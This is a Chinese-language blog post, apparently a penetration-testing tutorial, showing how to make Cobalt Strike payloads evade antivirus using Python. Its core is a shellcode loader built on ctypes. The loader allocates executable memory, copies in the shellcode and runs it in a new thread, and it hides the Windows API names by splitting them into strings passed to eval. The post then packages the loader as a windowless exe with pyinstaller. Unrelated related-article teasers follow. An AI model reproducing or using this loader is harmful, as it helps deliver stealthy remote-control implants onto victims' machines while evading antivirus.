cs免殺-使用python進行免殺

阿新 • • 發佈：2021-02-09

技術標籤：滲透測試

環境

使用python版本為python3.6 32位版本，64位版本測試會報錯。
安裝pyinstaller，pywin32

pip3 install pyinstaller
pip3 install pywin32

生成shellcode

使用cobalsstrike生成c語言shellcode。
在這裡插入圖片描述

使用shellcode loader載入shellcode

#!/usr/bin/python3
import ctypes

#shellcode 放這個位置
c = b"\xfc\xe8\x89\x00\x00\x00\x60\x89";


shellcode = bytearray(c)

a = 'ctypes.windll.' + 'kernel32.VirtualAlloc'
ptr = eval(a)(ctypes.c_int(0),
                                          ctypes.c_int(len(shellcode)),
                                          ctypes.c_int(0x3000),
                                          ctypes.c_int(0x40))
 

b = 'ctypes.windll.kernel32.' + 'RtlMoveMemory'
buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)

eval(b)(ctypes.c_int(ptr),
                                     buf,
                                     ctypes.c_int(len(shellcode)))
d = 'ctypes.windll.kernel32.' + 'CreateThread'
ht = eval(d)(ctypes.c_int(0),
                                         ctypes.c_int(0),
                                         ctypes.c_int(ptr),
                                         ctypes.c_int(0),
                                         ctypes.c_int(0),
                                         ctypes.pointer(ctypes.c_int(0)))
 
e = 'ctypes.windll.kernel32.WaitFor' + 'SingleObject'
eval(e)(ctypes.c_int(ht),ctypes.c_int(-1))

可以使用加密等方法進行免殺。

打包生成exe

pyinstaller -F shell.py --noconsole

執行，機器上線
在這裡插入圖片描述

cs免殺-使用python進行免殺

技術標籤：滲透測試環境使用python版本為python3.6 32位版本，64位版本測試會報錯。安裝pyinstaller，pywin32

使用Python進行防病毒免殺解析

很多滲透工具都提供了許可權維持的能力，如Metasploit、Empire和Cobalt Strike，但是都會被防病毒軟體檢測到這種惡意行為。在探討一個許可權維持技巧的時候，似乎越來越多的人關注的是，這個方式會不會被被殺軟殺掉？

淘寶秒殺python指令碼掃碼登入版

本文例項為大家分享了python淘寶秒殺的具體程式碼，供大家參考，具體內容如下

python實現秒殺商品的微信自動提醒功能(程式碼詳解)

技術實現原理：獲取京東的具體的商品資訊，然後再使用微信傳送提醒工具：需要兩個微訊號，這兩個微訊號互為好友

萬物皆可秒——淘寶秒殺Python指令碼，掃貨618，備戰雙11！

更多精彩內容，歡迎關注公眾號：數量技術宅，也可新增技術宅個人微訊號：sljsz01，與我交流。

win10免安裝python

win10免安裝python python專欄收錄該內容0 篇文章0 訂閱訂閱專欄1.下載python壓縮包解壓傳送門

吃雞300幀 CS:GO 900幀 Intel這次殺瘋了。。。

今年的CES大會上，咱們的老朋友AMD跟Intel在CES各顯神通，掀起了一場腥風血雨。

復化梯形求積分例項——用Python進行數值計算

用程式來求積分的方法有很多，這篇文章主要是有關牛頓-科特斯公式。學過插值演算法的同學最容易想到的就是用插值函式代替被積分函式來求積分，但實際上在大部分場景下這是行不通的。

如何使用python進行pdf檔案分割

這篇文章主要介紹瞭如何使用python進行pdf檔案分割,文中通過示例程式碼介紹的非常詳細，對大家的學習或者工作具有一定的參考學習價值,需要的朋友可以參考下

使用Python進行中文繁簡轉換的實現程式碼

中文繁體、簡體的差異，在NPL中類似英文中的大小寫，但又比大小寫更為複雜，比如同樣為繁體字，大陸、香港和臺灣又不一樣。先前寫過一篇中文繁簡轉換的文章，感覺寫的不太詳細，今天就針對Python下如何使用做進一步的

基於python進行抽樣分佈描述及實踐詳解

本次選取泰坦尼克號的資料，利用python進行抽樣分佈描述及實踐。備註：資料集的原始資料是泰坦尼克號的資料，本次截取了其中的一部分資料進行學習。Age:年齡，指登船者的年齡。Fare:價格，指船票價格。Embark:登船

詳解用Python進行時間序列預測的7種方法

資料準備資料集（JetRail高鐵的乘客數量）下載. 假設要解決一個時序問題：根據過往兩年的資料（2012 年 8 月至 2014 年 8月），需要用這些資料預測接下來 7 個月的乘客數量。

python進行引數傳遞的方法

在分析python的引數傳遞是如何進行的之前，我們需要先來了解一下，python變數和賦值的基本原理，這樣有助於我們更好的理解引數傳遞。

用Python進行實時計算——PyFlink快速入門

Flink 1.9.0及更高版本支援Python，也就是PyFlink。在最新版本的Flink 1.10中，PyFlink支援Python使用者定義的函式，使您能夠在Table API和SQL中註冊和使用這些函式。但是，聽完所有這些後，您可能仍然想知道PyFli

使用Python進行XML解析

XML 指可擴充套件標記語言（eXtensible Markup Language），常被設計用來傳輸和儲存資料。

資料載入、儲存及檔案格式知識圖譜-《利用Python進行資料分析》

所有內容整理自《利用Python進行資料分析》，使用MindMaster Pro 7.3製作，emmx格式，原始檔已經上傳Github，需要的同學轉左上角自行下載或者右擊儲存圖片。

資料清洗與準備知識圖譜-《利用Python進行資料分析》

所有內容整理自《利用Python進行資料分析》，使用MindMaster Pro 7.3製作，emmx格式，原始檔已經上傳Github，需要的同學轉左上角自行下載或者右擊儲存圖片。

資料規整：連線、聯合與重塑知識圖譜-《利用Python進行資料分析》

所有內容整理自《利用Python進行資料分析》，使用MindMaster Pro 7.3製作，emmx格式，原始檔已經上傳Github，需要的同學轉左上角自行下載或者右擊儲存圖片。

繪圖和視覺化知識圖譜-《利用Python進行資料分析》

所有內容整理自《利用Python進行資料分析》，使用MindMaster Pro 7.3製作，emmx格式，原始檔已經上傳Github，需要的同學轉左上角自行下載或者右擊儲存圖片。

資料聚合與分組操作知識圖譜-《利用Python進行資料分析》

所有內容整理自《利用Python進行資料分析》，使用MindMaster Pro 7.3製作，emmx格式，原始檔已經上傳Github，需要的同學轉左上角自行下載或者右擊儲存圖片。